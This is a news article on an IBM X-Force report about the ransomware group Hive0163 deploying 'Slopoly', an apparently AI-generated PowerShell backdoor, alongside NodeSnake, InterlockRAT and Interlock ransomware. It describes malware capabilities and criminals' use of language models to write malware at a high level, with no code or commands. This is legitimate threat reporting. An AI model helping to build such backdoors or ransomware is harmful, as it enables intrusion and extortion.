A financially motivated ransomware group is pioneering the use of artificial intelligence to create malware, marking a concerning evolution in cyberthreat tactics.
IBM X-Force researchers have identified that the threat actor Hive0163 deployed an AI-assisted malware called Slopoly during recent ransomware campaigns. The discovery represents one of the first documented cases of AI-generated malware being used operationally by cybercriminals.
"In early 2026, X-Force observed Hive0163 deploying a likely AI-generated malware dubbed 'Slopoly' during a ransomware attack, allowing the group to maintain persistent access to the server for more than a week," reads the report published by IBM. "Although still in the early stages, the adversarial use of AI is accelerating—and it's poised to significantly reshape the threat landscape, forcing defenders to fundamentally rethink today's security paradigms."
%20(1)%20(1).webp)
Hive0163 operates as a specialized post-compromise threat actor, utilizing multiple custom backdoors for maintaining long-term network access, data exfiltration, and ransomware deployment. Security researchers have linked the group to various malware developers and operators, including those behind Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware variants.
The Slopoly malware functions as a PowerShell backdoor that serves as a command-and-control client. Its capabilities include collecting system information, sending heartbeat signals to remote servers, executing commands through cmd.exe, and establishing persistence via scheduled tasks.
What makes Slopoly particularly noteworthy is its structure and extensive code comments, which strongly indicate AI-assisted development. This suggests that cybercriminals are successfully leveraging large language models to accelerate malware creation processes.
Researchers traced one intrusion to a ClickFix attack that deceived victims into executing malicious PowerShell commands. This initial compromise deployed NodeSnake, which serves as the first stage of a comprehensive command-and-control framework extensively used by Hive0163.
"NodeSnake is the first stage of a larger malware command-and-control (C2) framework heavily used by a threat actor tracked by X-Force as Hive0163. According to our observations, the framework spans a number of client implementations of varying capabilities in PowerShell, PHP, C/C++, Java and JavaScript for both Windows and Linux," continues the report. "These components have widely been reported as 'InterlockRAT' (Fortinet, eSentire) but despite its name, the final ransomware payloads may not be limited to Interlock only."
Following the initial compromise, NodeSnake downloaded additional payloads, including the more sophisticated InterlockRAT. This advanced malware enables reverse shell access, SOCKS5 tunneling capabilities, and remote command execution functionality.
The attackers subsequently deployed Slopoly alongside legitimate tools such as AzCopy and Advanced IP Scanner to expand their network access and facilitate lateral movement within compromised environments.
The campaign also involved deploying Windows Interlock ransomware, a 64-bit executable that supports various operational parameters. The ransomware can encrypt specific directories or files, delete itself after execution, operate as a scheduled task, and uses AES-GCM encryption combined with RSA-protected session keys.
The implications of AI-assisted malware development extend far beyond this single campaign. As large language models become more advanced and accessible, they effectively lower the barrier to entry for malware creation, potentially enabling less skilled threat actors to develop sophisticated attack tools.
"Looking into the future, AI-generated malware is only the first stage in a new arms race between defenders and attackers. The second stage is the use of agentic AI, and AI-integrated malware, which allow models to make decisions during all phases of the attack chain or during development and testing of advanced C2 frameworks," concludes the report.
Security experts warn that the weaponization of AI could lead to the creation of ephemeral malware that is harder to detect and attribute to specific threat actors. This development represents a significant challenge for cybersecurity defenders who must now prepare for AI-enhanced threats.
The discovery of Slopoly suggests that cybercriminals are moving beyond traditional malware development methods and embracing AI as a force multiplier. Organizations should prepare for an increase in AI-generated threats and consider how this technological shift might impact their security strategies and detection capabilities.